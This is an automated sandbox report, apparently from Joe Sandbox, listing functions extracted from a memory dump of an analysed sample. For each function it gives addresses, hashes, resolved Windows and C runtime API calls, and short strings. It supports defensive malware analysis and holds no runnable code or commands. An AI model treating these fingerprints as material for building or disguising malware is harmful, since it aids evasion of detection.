Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 8bc74e86ad7892e45763c7c2175561076085692adc4a2a21e1bd7b970ee0b1f8
Instruction ID: 4dc649b3f8ed8243d8a6abd08b978ee8f8a4358725c613413891c1272ad71460
Opcode Fuzzy Hash: 8bc74e86ad7892e45763c7c2175561076085692adc4a2a21e1bd7b970ee0b1f8
Instruction Fuzzy Hash: 9791B671B283419BCB649F188C8163DBAE0AFA4750F164D2FE8C6CA271E270E584DB57

Function 04212920 Relevance: .8, Instructions: 751COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c69a6815894f7947a6a0542994c29682853ba558057bf9cd49837bbb9556ffd7
Instruction ID: 7cfea7e06edd418942b86eab24f49515d981de66c649673de0aeb6967dc8bb47
Opcode Fuzzy Hash: c69a6815894f7947a6a0542994c29682853ba558057bf9cd49837bbb9556ffd7
Instruction Fuzzy Hash: 46624731618741CFD725DF18C080A6AB7E2FF98314F148AADE8CA9B361D675F846CB52

Function 0421D450 Relevance: .5, Instructions: 492COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: caaf1d4bcde0c24294baec86a5e2eb3cea651728695487e10075cc7e93abdcfa
Instruction ID: 4eea6329d34351d48fd293f1f2f257295656cab3bd10129676d7e83e73ba8ab5
Opcode Fuzzy Hash: caaf1d4bcde0c24294baec86a5e2eb3cea651728695487e10075cc7e93abdcfa
Instruction Fuzzy Hash: DD1288B0628741CFD324CF28C48066ABBE2FBA5314F144E2DD5D687BA1E776B445CB45

Function 04205540 Relevance: .5, Instructions: 467COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7c5bfcb74d64b106436c267bea2b2e9854b0246cc83a94d6d7658a636303708
Instruction ID: 460b055fdb5b6ad8fbce4cd5214cf7820ee73be099995be3f5939c4fa3150959
Opcode Fuzzy Hash: b7c5bfcb74d64b106436c267bea2b2e9854b0246cc83a94d6d7658a636303708
Instruction Fuzzy Hash: 2D02A4B1F3020AABDF24DE98D8956BD7BF1AB04350F14852AD515EA2E2E374E5C0CF52

Function 0423908F Relevance: .4, Instructions: 417COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 268e8702608a6b90ebe5f704738b9a629cec0ea57dbf574d3ec40b0b1ed608f4
Instruction ID: 3aa45bdd258de38d3bfd94e476f81a9ddb09e88725d1be7fda417b7c251f9919
Opcode Fuzzy Hash: 268e8702608a6b90ebe5f704738b9a629cec0ea57dbf574d3ec40b0b1ed608f4
Instruction Fuzzy Hash: 3EE1E6F1F3010A8BDF249F9C98811BD7A70AB06316F24052BD115EB3A1E6F5E9C18B93

Function 0421867A Relevance: .3, Instructions: 279COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13b49794fb555ce5a457b705e9d36dc15405e88024e94027de3508aab2a8635c
Instruction ID: e65c2b55498da7b856312da821319bab781e81a48908d550f7d1c3b7e56d1530
Opcode Fuzzy Hash: 13b49794fb555ce5a457b705e9d36dc15405e88024e94027de3508aab2a8635c
Instruction Fuzzy Hash: 5FC18170608386DFD715CF28D48469ABFE1BF65304F04865DE8989B352D370EA68CB92

Function 04229CC2 Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 404008158dafff43aec7ad6a46d065142d89c1995864d67ae93c323eefc80fdb
Instruction ID: 114f7c592c1df90eccdffcdd27c396b7bc613fba7f08a6cbebeaf153936748b3
Opcode Fuzzy Hash: 404008158dafff43aec7ad6a46d065142d89c1995864d67ae93c323eefc80fdb
Instruction Fuzzy Hash: A581B2726083154FD308CF59C95231AFBD6ABC8310F4AC53EE9959B7A1E6B8DC058BC5

Function 0422F4DF Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a8cd4802bb5dde251916ee4563a48a6af48aeae2953e1db2d908d410a145637
Instruction ID: d4c6a089bcc5e3a9aa8b348606774173ed45e96c0d66c1020890f9714c9290bd
Opcode Fuzzy Hash: 4a8cd4802bb5dde251916ee4563a48a6af48aeae2953e1db2d908d410a145637
Instruction Fuzzy Hash: 5D714562F3056E7ADF24899C8F40D7D26B1A784314F274623E209DA2A0E7F9B940F652

Function 04224853 Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8976ad82445888a3523337de21bd725d268fd77f590c92d331c08a3a482d989a
Instruction ID: b4b036716937334d3c5f9e5327f5ffc63436054ba59f691543f9e2cd465420ad
Opcode Fuzzy Hash: 8976ad82445888a3523337de21bd725d268fd77f590c92d331c08a3a482d989a
Instruction Fuzzy Hash: 5171C371F383A6FBCB28EF598A8162DB6E0AB84700F154D2FE585DB250D274E884C747

Function 04229997 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54117711b5b6f3e3548b285e01c7f3ff021aa8cd1369d00f9261af8dca8f2be9
Instruction ID: f922b6f387c1c42e97c5b23efdb07acbe24db02577c661be741248006141997a
Opcode Fuzzy Hash: 54117711b5b6f3e3548b285e01c7f3ff021aa8cd1369d00f9261af8dca8f2be9
Instruction Fuzzy Hash: F6511873B106164FC34CEE7C8D92169F6D6ABC8240F46CA3EE44ADB391F970DA12C681

Function 04222152 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66d74e5b20d9c384740991f0b87e692f2e80e905805bc9109d63d683fad776b8
Instruction ID: 4c7c3454d924f775e2a6dfa8eee3b2f112dc3b040aadd13e0e516eaa0aefac3a
Opcode Fuzzy Hash: 66d74e5b20d9c384740991f0b87e692f2e80e905805bc9109d63d683fad776b8
Instruction Fuzzy Hash: B951BB30F24237EBCF248ADC8A40A7EB7B4AB05610F514697E611F7291D676E984CF63

Function 0422474B Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5af1248077b72cee271f1dc4513ba9fdd6fbe0fa2681126dcf50cb3d141ba941
Instruction ID: b4e31d36fea51be608d4d501e001d6b478ba6f6829eaf57c4d9754cf49fb75f2
Opcode Fuzzy Hash: 5af1248077b72cee271f1dc4513ba9fdd6fbe0fa2681126dcf50cb3d141ba941
Instruction Fuzzy Hash: 6D21F8B1724722BFC728AE1CDE4052DB2D5AB85210F14497BF86AEF750E270EC408783

Function 04226CA9 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66ff2f2a13dd8e2f3e7900633aa22c2d0bddf0cea2b0e0fcf3d4903cf0c1afe8
Instruction ID: 683076b847868f7c2f3f51f2a3f27ab4dde7f7eb9a715087091fe4665f2d69f9
Opcode Fuzzy Hash: 66ff2f2a13dd8e2f3e7900633aa22c2d0bddf0cea2b0e0fcf3d4903cf0c1afe8
Instruction Fuzzy Hash: 84216D72A1022A9FCB24CF18C990A6AB7A1FF85718F68855CC8459B342D771F842CB91

Function 0421047F Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0cbf25b4c85234f202655fa8cc2e504dfd54c569fa544efbece1cc302c4c175
Instruction ID: 7e95ff51e3836f3cf9a8eff7789caab2191373348289b497013f71410d323535
Opcode Fuzzy Hash: c0cbf25b4c85234f202655fa8cc2e504dfd54c569fa544efbece1cc302c4c175
Instruction Fuzzy Hash: C6118A77A2427107D711CE7558E012AF7A2ABC622270F4275D982EB652C530EC5582D5

Function 04200D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: fc80ff171ad150b496fd9bb7b648541e5d288e1a345aca2e49a28a9ce9a563ca
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 8301A7767106058FEF21CF24E804FAA33F9EB86215F4584A5E906D72C3E774B941CB90

Function 0424FD7C Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5466edf919cf6453cb3fe632e64b7bc90129a20e483f7dfcae3dbb783ead61c5
Instruction ID: 1bbbcd3a4aefeceeb4ff2a8dc399c8a73a5061bf8a75abebae2535d6cada58ba
Opcode Fuzzy Hash: 5466edf919cf6453cb3fe632e64b7bc90129a20e483f7dfcae3dbb783ead61c5
Instruction Fuzzy Hash: 9BE0EC72A21278EBCB19DB99CA4498AF3ECEBC5B54F5644A6F905D3110C270EE00C7D4

Function 0422A15E Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6d0ec938ce4093d67a2cf61a3cc3f8e03a2e4f7c65607b08f985ba338c785d5
Instruction ID: 07f262be0c53051f665b25bb0c3dbd264e452315670e0e9dd572fecb2d286ecc
Opcode Fuzzy Hash: d6d0ec938ce4093d67a2cf61a3cc3f8e03a2e4f7c65607b08f985ba338c785d5
Instruction Fuzzy Hash: 7AE09A75A116859ED7128F25E9A4B007BA1E714A14F458075E405D7A79F3B47880CF4A

Function 04226C4B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d46244e68fc71b8cbf41339a9e21dde89906441e25df86e8e15a46fb3bb963b5
Instruction ID: 8767e4e64b46a92352bfdd40661a147fff64ceb884ab37cc795abae3ef0d819b
Opcode Fuzzy Hash: d46244e68fc71b8cbf41339a9e21dde89906441e25df86e8e15a46fb3bb963b5
Instruction Fuzzy Hash: 76D01231265650AFCA46DB58CE50F00B3A0AB88A32F2582A0B820AB2F1C620EA01CA01

Function 0422F4CC Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adb50997bff8f6b42dea5567a3e80c24e84f9fd98b00b9a5e01fe7e8c8691b55
Instruction ID: c0944383d73aac26117361346b053748916b56d97ab65fadc12e4df891c8d7e9
Opcode Fuzzy Hash: adb50997bff8f6b42dea5567a3e80c24e84f9fd98b00b9a5e01fe7e8c8691b55
Instruction Fuzzy Hash: 7AB00279661540CFCA55CF08C198E00F3F4FB48760B068491EC05CB722C234ED41CA10

Function 04259C06 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 04259D25
CatchIt.LIBVCRUNTIME ref: 04259E84
_UnwindNestedFrames.LIBCMT ref: 04259F85
CallUnexpected.LIBVCRUNTIME ref: 04259FA0

Strings

csm, xrefs: 04259CB0
csm, xrefs: 04259D5C
csm, xrefs: 04259C43

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: CallCatchFramesNestedUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2332921423-393685449
Opcode ID: 4d4d2abbed9b856c4e49574ec055b924c190fec3ea5a9e19aedb67fed442bc91
Instruction ID: b9d2f51ceed64e2f1ad7bdb1aac960b44597842c2cc6a3f62b2518fb96b93932
Opcode Fuzzy Hash: 4d4d2abbed9b856c4e49574ec055b924c190fec3ea5a9e19aedb67fed442bc91
Instruction Fuzzy Hash: E2B1A9B1A2020AEFDF18DFA4C9809AEBBB5FF44314F14405AEC156B221D375FA91CB91

Function 0423297F Relevance: 10.7, APIs: 7, Instructions: 234COMMON

Download Yara Rule

APIs

CreateCompatibleDC.GDI32(00000D62), ref: 04232AFB
DeleteDC.GDI32(00000002), ref: 04232D68
DeleteObject.GDI32(?), ref: 04232D71

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: Delete$CompatibleCreateObject
String ID:
API String ID: 1022343127-0
Opcode ID: e95f5015060c6103ea10429a1b77e37f05786f833e418949151545d05b0bc3b2
Instruction ID: f72b6010ca6418d9a4d8b6573eda19c20bc23cdbc50cb89c34a0b689460f6117
Opcode Fuzzy Hash: e95f5015060c6103ea10429a1b77e37f05786f833e418949151545d05b0bc3b2
Instruction Fuzzy Hash: E28119F1B2021ADBDF208F949CC467E7A74EB09316F240996E514FA2A0D3B5A941C776

Function 04252C05 Relevance: 9.3, APIs: 6, Instructions: 298COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fe71bcdd1bbb702f49a54012c45d7b8d444f282691c212cc4cbc8a317458075
Instruction ID: 42f45d9ff2df2ae2630b2cca227a301d741e6295ed752cd8bdae7c3c409bbdb9
Opcode Fuzzy Hash: 9fe71bcdd1bbb702f49a54012c45d7b8d444f282691c212cc4cbc8a317458075
Instruction Fuzzy Hash: EAB1B174B2024AEFEB15DF98C880BAD7BB5AF89314F044199D811972E1DBB0B942CF71

Function 042459C6 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 04245B59
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04245B75
__allrem.LIBCMT ref: 04245B8C
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04245BAA
__allrem.LIBCMT ref: 04245BC1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04245BDF

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 2e1f11e2f5fb8b6f5f5cb9471793ade9c397e797c40a1014ab29af20b239fdf2
Instruction ID: f7f059ea2664b18e4d1f5a14941f2d2db3331a960ca24116e58620f8447931b7
Opcode Fuzzy Hash: 2e1f11e2f5fb8b6f5f5cb9471793ade9c397e797c40a1014ab29af20b239fdf2
Instruction Fuzzy Hash: 0881D571720716BBE728DF68CC80B6AB3E9EF85368F144529EA91D76D0E770F5808B50

Function 04232D82 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 431COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 04233124

Part of subcall function 042310D3: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 042311AC

Part of subcall function 0423297F: CreateCompatibleDC.GDI32(00000D62), ref: 04232AFB

Strings

Ku^%, xrefs: 0423308D
Ku^%, xrefs: 04232FC9

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: AllocateCompatibleCreateHeapInfoParametersSystem
String ID: Ku^%$Ku^%
API String ID: 392924372-1067927601
Opcode ID: 5fba2874abc2024b8c6e5124d58d55933df8614bf4ced896e9a56da650471c50
Instruction ID: 3f9b3089223e40ea1218340f892cf1b6eeb68b339ac9c3298c03be4944a1714b
Opcode Fuzzy Hash: 5fba2874abc2024b8c6e5124d58d55933df8614bf4ced896e9a56da650471c50
Instruction Fuzzy Hash: FAE12AF1F3051A87DB28CB988C4567EBA70AB05316F14492AF911FB2D0E775FB40C696

Function 0424C469 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0424C460,0423D70D,0423D25E), ref: 0424C477
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0424C485
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0424C49E
SetLastError.KERNEL32(00000000,0424C460,0423D70D,0423D25E), ref: 0424C4F0

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 3af03ad12e9647128257a5912ac6000d76f7b2b06ff93b3a1d903c536e80f5b5
Instruction ID: 455d045ab9a4b30a8e25b1eda121a92ebea67491ebaedb1f29d46c30e2f97906
Opcode Fuzzy Hash: 3af03ad12e9647128257a5912ac6000d76f7b2b06ff93b3a1d903c536e80f5b5
Instruction Fuzzy Hash: A501F03772F2136EB7381BBABD8557B2A94DF812757210239E934C50F4FFE168409195

Function 04253A37 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

$^F, xrefs: 04253C3F

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID: $^F
API String ID: 0-2072159057
Opcode ID: 7b640e70ded73f9c08873221f97cb98eab12bfdaea4e205fc4c25b8478a09ce9
Instruction ID: eb8b207f4fb14703b69fbe22c04cf3df58f79e7934b9efc51d672082700f1db2
Opcode Fuzzy Hash: 7b640e70ded73f9c08873221f97cb98eab12bfdaea4e205fc4c25b8478a09ce9
Instruction Fuzzy Hash: D841F872720744AFE725DF78CC01B6ABBE9EB84754F10952AEC11DB2A0D675F9408B90

Function 042464A4 Relevance: 7.6, APIs: 5, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3608c6e5e2c178f7c1cfe104e837bc4478c8e9b3100bb118724dc105c523b5b
Instruction ID: 6668b69cc38a9002ef77ea5517fe25ee5e8b6543d0d96f9c669f36f54bbb4c4c
Opcode Fuzzy Hash: c3608c6e5e2c178f7c1cfe104e837bc4478c8e9b3100bb118724dc105c523b5b
Instruction Fuzzy Hash: C351A335B20249AADB14DFE4D944ADEB7BCEF49710F10001AE815E7250FB74AA41CB69

Function 04246F39 Relevance: 7.6, APIs: 5, Instructions: 143pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(04246E5E,?,00000000,?), ref: 04246F5B
GetFileInformationByHandle.KERNEL32(04246E5E,?), ref: 04246FB5
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,04246E5E,?,000000FF,00000000), ref: 04247043
__dosmaperr.LIBCMT ref: 0424704A
PeekNamedPipe.KERNEL32(04246E5E,00000000,00000000,00000000,?,00000000), ref: 04247087

Part of subcall function 04246C00: __dosmaperr.LIBCMT ref: 04246C35

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 1206951868-0
Opcode ID: a8d23b60b5c6af24eb5b294ccd2b8419e7252ea46638bc04f1f82efcf21124ef
Instruction ID: 09eeeada74cc04b64556edd3ad1e1346bd59df93898500a94c47304486a4b127
Opcode Fuzzy Hash: a8d23b60b5c6af24eb5b294ccd2b8419e7252ea46638bc04f1f82efcf21124ef
Instruction Fuzzy Hash: D5416EB1A20205AFDB28DFB5DC449AFBBF9EFC8300B00542DE456D3610EB70A945CB20

Function 04204500 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 191COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0420467F

Strings

fE, xrefs: 0420474C
fE, xrefs: 04204557
,]{: }, xrefs: 04204726

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: _strlen
String ID: ,]{: }$fE$fE
API String ID: 4218353326-1418347821
Opcode ID: c472bb84d9ff05f3389f2633287c6e63b4c59ab839c65fc641c5baeda17e4bdc
Instruction ID: de0ab9f8323e41b5b8b5c3c8132a646be69f5fbee85f8452d0b143f07ebc65bf
Opcode Fuzzy Hash: c472bb84d9ff05f3389f2633287c6e63b4c59ab839c65fc641c5baeda17e4bdc
Instruction Fuzzy Hash: 8051EE72B243464FE720BAA99C5072BA2C68FD5258F1AC5389E18C33D3FA71F8158612

Function 0425A02B Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 118COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 0425A050
CatchIt.LIBVCRUNTIME ref: 0425A136

Strings

MOC, xrefs: 0425A062
RCC, xrefs: 0425A06A

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: f6539cf28fa7df93cb7a4fd0398e0aeb39c553d0f7c18ec6f96af6878300a19c
Instruction ID: d693d6c6f6b2b10af7a96e28e55ac64d3ff8364d71a114aa64faaa67a40a7340
Opcode Fuzzy Hash: f6539cf28fa7df93cb7a4fd0398e0aeb39c553d0f7c18ec6f96af6878300a19c
Instruction Fuzzy Hash: FE416A72A1020AEFDF16DF98DD81AAEBBB5FF48304F198159F914A7220D335A950DB50

Function 042509B1 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(0046B080,0425578A,00000000,?), ref: 04250A14

Part of subcall function 0425346A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,0425578A,0425578A,04243F62,04250768,0000FDE9,00000000,?,?,?,04251067,0000FDE9,00000000,?), ref: 04253516

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 04250C6F
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 04250CB7
GetLastError.KERNEL32 ref: 04250D5A

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: f7a2fa6a9c7b7c2702c5415ca5342024ae727f2fb94ff8ae16218cd9c601ae44
Instruction ID: 8d78bbdcbb79b4a373ba15d837c0b82dc75ee9c3627c1294a85bbc946d0cad98
Opcode Fuzzy Hash: f7a2fa6a9c7b7c2702c5415ca5342024ae727f2fb94ff8ae16218cd9c601ae44
Instruction Fuzzy Hash: F1D16975E106599FDF15CFE8C880AADBBB8FF49314F18852AE855EB361E730A841CB50

Function 04233E77 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 252COMMON

Download Yara Rule

Strings

9a%^, xrefs: 04233F6A
M%, xrefs: 04233FFA

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID:
String ID: 9a%^$M%
API String ID: 0-1620995425
Opcode ID: 8dd5fb1bb415952618eeb69f9c4c5347ce22eee3cd407679ffb4ef07d832097c
